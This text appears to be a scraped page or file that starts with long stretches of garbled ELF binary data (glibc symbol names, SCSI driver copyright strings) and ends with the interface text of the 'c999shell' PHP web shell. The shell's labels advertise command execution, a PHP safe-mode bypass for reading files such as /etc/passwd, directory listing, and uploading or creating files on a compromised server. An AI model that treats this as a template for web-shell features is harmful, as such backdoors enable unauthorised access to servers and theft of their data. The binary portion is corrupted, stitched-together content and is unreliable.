F:B-AB  :C8AB D<:PChAB F \:CsAB FFF:@DAB E:DzAB F:PGAB N:GAB F;HPAB D;IEAB D8;PIAD P;`IAB KIp;J0AB D;0JAB ;PJ&AD ;J_AB D;JgAB F;PK#AB <KnAB  (<KAB FFFL<LAB Fl<MsAB E< NXAB D<N0AB FF<NAB <NPAB F= OsAB C =OAB F@=P"AB X=P"AB p= QAB F=R"AB =RYAB L=PS:AB D=SAB IE>`TAB >T'AB D8>T!AB P>T*AB Dl>U:AB >PU.AB >UAB C>V8AB AC>V7AB >W@ AB I?@a2AB ,?aRAB FL?a3AB d? bAB |?0b]AB FE?bAB G? cAB G?c,AB ?c)AB A@ dQAB D$@d?AB F D@f]AB ACCh@ gAB F@h AG @ h AG @0h AG @@h*AB @phfAB DAh|AB D A`iAB FHFDAPj&AB \Aj-AB DxAjAB Aj7AB AAkAB D AkAB FFI Al0AB ACCBl.AD A,Bm.AD AHB0m.AD AdB`mAB FB nAB BFBoZAD ACB p> AB IB`}{AB AC}AB C~AB 0C~ AB HC ~AB `C@~lAB A|C~-AB FCNAB FzR| #AB E<AB E__gmon_start__libc.so.6_IO_stdin_usedsched_get_priority_minsetuidsocketglobfree64fflushstrcpyshmget__printf_chkisinfstrncmpstrrchrwaitpipeshmatperrorconnectgetpwuidmmap64glob64strncpysignalfork__stack_chk_failshmctlputcharselectreallocabortstdin_exitsocketpairmemchrgetpidkillstrftime__assert_failrewindstrtokexeclpfgetsgetpwnamcallocgetppidstrlenmemsetstrstrfcvt__errno_locationreadgetpagesizedup2__fxstat64__fprintf_chkstdoutfputcfseeko64fputsmemcpyfcloserand__strtol_internalsetsockoptmallocstrcatstrcasecmpsetegidsched_setscheduler__strncpy_chkgetgid__lxstat64__xstat64getenv__ctype_b_locsscanfgetservbynamestderrioctlalarmgethostbynameseteuiddupgetuidrcmdreadlinkgetegidfilenogethostnameusleepfwritegettimeofdaygeteuidsched_get_priority_maxlocaltimelseek64strchrgetlinefdopenqsort__strtod_internal__strcpy_chkvallocfcntlecvt__sprintf_chkmemmovefopen64_IO_getcsetgid__strcat_chksetbufstrcmpstrerror__libc_start_mainferrorgcvt__strtoul_internalsysconffree__cxa_atexitGLIBC_2.4GLIBC_2.3GLIBC_2.2GLIBC_2.1GLIBC_2.3.4GLIBC_2.1.3GLIBC_2.0/lib/ld-linux.so.2  ؄oh    oooxoo(oo604ɲpb kg??0x `c+P̯p>`Ue `p:D@x jò`SP0 @9T]@ELpaiP0pٳy !VP pspk`f`hrXAPWF+g<`hhVp0iвKp@0`@,p4LW,pS 9޲ZUoPo NC@s@ǵ@iPү(ŻЮ3Ep^@<@h0y h@2Ϯ   /dev/dsp` p `}0|P@|p{@{{zremote-1.16schily@(#)scsi-remote.c 1.16 04/08/24 Copyright 1990,2000-2003 J. Schilling0.8schily@(#)scsitransp.c 1.91 04/06/17 Copyright 1988,1995,2000-2004 J. Schilling`p@PpШP0 0@ШPP0 0@scsihack.c-1.43schily@(#)scsihack.c 1.43 03/11/28 Copyright 1997,2000,2001 J. SchillingPPP @`scsi-linux-ata.c-1.7@(#)scsi-linux-ata.c 1.7 04/06/12 Copyright 2002 J. Schillingscsi-linux-sg.c-1.83-RH@(#)scsi-linux-sg.c 1.83 04/05/20 Copyright 1997 J. Schillingscsi-linux-pg.c-1.43@(#)scsi-linux-pg.c 1.43 04/01/15 Copyright 1997 J. SchillingFFFFG9GPGlGGGG H0HHH]HvHH;;H4 d    4 h    , \  H I(IPI    <uI&<?<U<m<IIH t I   D<tI<0TxIJ<<<==7=O=^=Hs== JHJpJ=$==DpJJ8dJ=HKP >%>|@>/K^> CKdKKDz>KKK Ld(\$T0L>>XLL>LL>>$?1?P|O?l?L?$????LL(M@%@p?@XMW@q@@@@pMM@Ht@MMN0N0PxA#APN:A,lNRANNN\NN OoA(OJO<``O8AAAlAAA B+BCB]BxBBOOBBHhOBBC1CMChCCCCC CC( O PPPxPPPPP QP p    QLQdQzQQQQ RD!!R(!1RCR#D9D`RRTD`!iD!!!RRRR"4"X"%SDDD5SDDLS|"""#T####4$h$$$%<%p%%%&X&&&'8't'''(L((((8)t)))$*`***+@+x+++$,X,,,,$-T----.P....0/h///040h0001@1x111 2T2222(3\333tS3 4H4p44E4!E4SS?EYESS5ThET0T05T55UT5~E5646T6x6E666mTT 7ETTEETTU@UD777708UUUl8888(9UP9x999F"F V&V9VOVbVtVVVVVVVW%W7WGWZWpWWWWWXX8X[Xfile_write_err #?*&+?bad_filebad_file_modebad_file_op(NaN)(Infinity)`e ddcdda2wav.debugELF4R4 (44444455@<=@HHH Ptd^^Qtd 44HH !ohh@+ @3 ;oxxHoW  `    id  ou؄{ ^lqlD@@@@@@C Q|+ QQ.shstrtab.interp.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.ctors.dtors.jcr.dynamic.got.got.plt.data.bss.gnu_debuglink.dynbss.gnu.liblist.gnu.conflict.gnu.prelink_undo 44HH !ohh@+ @o (  ;oxxHoW  `    id  ou؄{ ^lqlD35@@@@@@C Q Qp+ QQD$W

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0428 ]--